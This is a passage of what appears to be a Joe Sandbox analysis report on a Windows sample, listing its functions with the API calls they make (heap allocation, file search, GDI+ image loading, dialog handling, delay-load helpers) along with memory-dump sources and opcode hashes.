                                        • Opcode Fuzzy Hash: 8fa04fa1d374c16cdefb0a7a8c801b4be51b30f247d418c8a87e94c3eab35654
                                        • Instruction Fuzzy Hash: B411CA37A116256F9B219E18DC9099AF3D6EB84770B1A41B2FD15AF354FB30DC0187D2
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BBCE45
                                          • Part of subcall function 00BB5E37: __EH_prolog.LIBCMT ref: 00BB5E3C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 65e589e476e5e450f446507fb4814de7d8300fd064327969d7c43859367eb692
                                        • Instruction ID: de78a70f397d7803efd03a35d9baaf942cd9c4d7f5a1aaf3bab05f2bcb280057
                                        • Opcode Fuzzy Hash: 65e589e476e5e450f446507fb4814de7d8300fd064327969d7c43859367eb692
                                        • Instruction Fuzzy Hash: 4C112171A01244DBEB15DB798945BFEBBE89F44300F1444ADA446A3682DBF49E04C762
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 026c7b8489c52d952429faa0e49f9c7c801ea3247ed34a57a0b770e0d8872f2f
                                        • Instruction ID: b1d1bbc71ea35f1b4b02b6fe9c30788b1bb7339e891d4da87488df9a053a407d
                                        • Opcode Fuzzy Hash: 026c7b8489c52d952429faa0e49f9c7c801ea3247ed34a57a0b770e0d8872f2f
                                        • Instruction Fuzzy Hash: 0D01A533D00528ABCF11ABA8CC919FEB7B5EF88740F0145A5E916B7252DAB4CD00C6A0
                                        APIs
                                          • Part of subcall function 00BDB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BD9813,00000001,00000364,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BDB177
                                        • _free.LIBCMT ref: 00BDC4E5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AllocateHeap_free
                                        • String ID:
                                        • API String ID: 614378929-0
                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                        • Instruction ID: ab4ee813c0e3fd5f1839570eca9f26e7b4cdeecbacbd8e34e4e6b834ee5e1ef1
                                        • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                        • Instruction Fuzzy Hash: F601D6732003066BE7318F659885A6AFBEDEB85370F25096EE594933C1FB30A905CB64
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BD9813,00000001,00000364,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BDB177
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ed3af53af9bc0d73ee55160139a75c07503b14ae82e592b463a8bcab33efd2b1
                                        • Instruction ID: e27e36ac98433dd2a9d08ea67773d08fdcc3f4c663a75338bd9026159d3258cb
                                        • Opcode Fuzzy Hash: ed3af53af9bc0d73ee55160139a75c07503b14ae82e592b463a8bcab33efd2b1
                                        • Instruction Fuzzy Hash: 0CF09036525125F6DB255A21AC19F9EF7C8EB41760B1A8197B808BB390FB30D90186A0
                                        APIs
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00BD3C3F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AddressProc
                                        • String ID:
                                        • API String ID: 190572456-0
                                        • Opcode ID: 253a9e8601eaf208b846e626eded8f1795a0605ae76d3127aaaf0842059b6136
                                        • Instruction ID: ad82fc6d156f1216f0627288326355928b680cb54bd74620c7b3b7501d442870
                                        • Opcode Fuzzy Hash: 253a9e8601eaf208b846e626eded8f1795a0605ae76d3127aaaf0842059b6136
                                        • Instruction Fuzzy Hash: FCF0A7362103179F8F114E68EC04A9AB7D9EF45F607184566FA05E7291FB31EA20C791
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 874196957e503d31aa44168927e9e24de7d873259c46b1c7a873346c5d1a9e76
                                        • Instruction ID: a48a2af9b876fb8d7bf0fed12c2e3f2abbd468f82e51cd8a2642991c5fe7ff53
                                        • Opcode Fuzzy Hash: 874196957e503d31aa44168927e9e24de7d873259c46b1c7a873346c5d1a9e76
                                        • Instruction Fuzzy Hash: 78E0653120611697D67126659C05F9FFBC8DF417A6F1502D3BC589B391FF20CC018AE1
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00BB5AC2
                                          • Part of subcall function 00BBB505: __EH_prolog.LIBCMT ref: 00BBB50A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: dc3c7926d6a8ea6e199b7e0044ee0015d15bac1240dc34fa9d2847e54ec3fd57
                                        • Instruction ID: bbf8c6e9b466e4bb399852aed16259788cc9d854ffc7b06f12490215a9e050ca
                                        • Opcode Fuzzy Hash: dc3c7926d6a8ea6e199b7e0044ee0015d15bac1240dc34fa9d2847e54ec3fd57
                                        • Instruction Fuzzy Hash: 2D018C30920690DAD725FBB8C051BEDFBE4DF64304F5084DDA45663282CBB41B08D7A2
                                        APIs
                                          • Part of subcall function 00BBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6C4
                                          • Part of subcall function 00BBA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6F2
                                          • Part of subcall function 00BBA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00BBA592,000000FF,?,?), ref: 00BBA6FE
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BBA598
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseErrorLast
                                        • String ID:
                                        • API String ID: 1464966427-0
                                        • Opcode ID: 88977e1d03f38aafdc94fa00596be9300d774850284be88756bc2db76a109f74
                                        • Instruction ID: 74c385865c7c293c432415fca063bac87541a195e579e4cb866d80ca3674f17c
                                        • Opcode Fuzzy Hash: 88977e1d03f38aafdc94fa00596be9300d774850284be88756bc2db76a109f74
                                        • Instruction Fuzzy Hash: 04F08231808790ABCB3257B48944BEBBBD06F2A331F048A89F1FD52196C2F551D89B23
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 00BC0E3D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: 05940d77c4ba2e60c513532e3183f08cba20661d0bc464e4b6193fa09433c704
                                        • Instruction ID: 828030120d6a1a656e1e7a81027d8ca52b46fb9722057b0518921ac5517e3985
                                        • Opcode Fuzzy Hash: 05940d77c4ba2e60c513532e3183f08cba20661d0bc464e4b6193fa09433c704
                                        • Instruction Fuzzy Hash: 2AD02B01A1509597DB11333C6859FFE2AC6CFC7311F0D0CEDF2456B283CE980C86A261
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 00BCA62C
                                          • Part of subcall function 00BCA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00BCA3DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                        • Instruction ID: fcb85efc30d673f2769b079d05ba7efebe92e9eda7d00f5ccadb83ecf271fcfa
                                        • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                        • Instruction Fuzzy Hash: B1D0C97121020DBBDF42AFA19C52F7EBAD9EB40348F0481B9B842D5191EAB1ED10A666
                                        APIs
                                        • DloadProtectSection.DELAYIMP ref: 00BCE5E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: DloadProtectSection
                                        • String ID:
                                        • API String ID: 2203082970-0
                                        • Opcode ID: cd4c428546eb046fdcfa0f0a625147461b41e263258525952a244e1eb107a520
                                        • Instruction ID: 9229de2752912875e98878f3a93b5aa6e38f60f17df00c7cc2632ecb6ff50ce5
                                        • Opcode Fuzzy Hash: cd4c428546eb046fdcfa0f0a625147461b41e263258525952a244e1eb107a520
                                        • Instruction Fuzzy Hash: 26D0A9B0080280CAC612EBA89892F893AD4B322704FA80099B62492090CB7CC480C601
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00BC1B3E), ref: 00BCDD92
                                          • Part of subcall function 00BCB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCB579
                                          • Part of subcall function 00BCB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCB58A
                                          • Part of subcall function 00BCB568: IsDialogMessageW.USER32(0001044E,?), ref: 00BCB59E
                                          • Part of subcall function 00BCB568: TranslateMessage.USER32(?), ref: 00BCB5AC
                                          • Part of subcall function 00BCB568: DispatchMessageW.USER32(?), ref: 00BCB5B6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: 4d5c2ffdacfb64f6ac146453c13c753eac2e2dc8fce49d9f5dec670d55745433
                                        • Instruction ID: d7ec463c8c0bfc007835e33d0c529bae9ed82d5a44ef7e6ae52bc4e1598c4598
                                        • Opcode Fuzzy Hash: 4d5c2ffdacfb64f6ac146453c13c753eac2e2dc8fce49d9f5dec670d55745433
                                        • Instruction Fuzzy Hash: 34D09E71254300BAD6012B51CD06F1E7AE2BB98B09F004598B284750B1CA729D21DB11
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,00BB97BE), ref: 00BB98C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: d9e78c5096153e6e690dc14edaffae4c2156cf0335fe0632993e42d2db2e4e23
                                        • Instruction ID: 94d5edf268de3362bd18fe521e15738aaa95622cff1cd68362760f2881c43181
                                        • Opcode Fuzzy Hash: d9e78c5096153e6e690dc14edaffae4c2156cf0335fe0632993e42d2db2e4e23
                                        • Instruction Fuzzy Hash: F4C01234400105878E2047289C480E573A1EE537E67B486D4C1388A0E1C3A2CC47EA10
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: b18fec7e3318e0b728ba35ce93101dd53e8da9c6df0934ccc21cbe6bc28ebff8
                                        • Instruction ID: 2a7879f3294785fc80cf4e4ff206121e775f6b674d005695470fa3f6343991d6
                                        • Opcode Fuzzy Hash: b18fec7e3318e0b728ba35ce93101dd53e8da9c6df0934ccc21cbe6bc28ebff8
                                        • Instruction Fuzzy Hash: 40B012D1259080FC350453061C03E3B01CCC2C3B10330C1BEFC25C0180E940FE451831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d0d907c0ca8ad6c329d2a65e0db0fe351cfa0daaa031f3684ab3fae2c3d6f86c
                                        • Instruction ID: 847844154d9b214c8dc54c84c7fe9715a1f792590bb860c4af7db010b18de8ed
                                        • Opcode Fuzzy Hash: d0d907c0ca8ad6c329d2a65e0db0fe351cfa0daaa031f3684ab3fae2c3d6f86c
                                        • Instruction Fuzzy Hash: 4AB012D535D180FC3104524A1C43E3B01DCD1C1B1033040BEF825C0080E980FE421931
                                        APIs
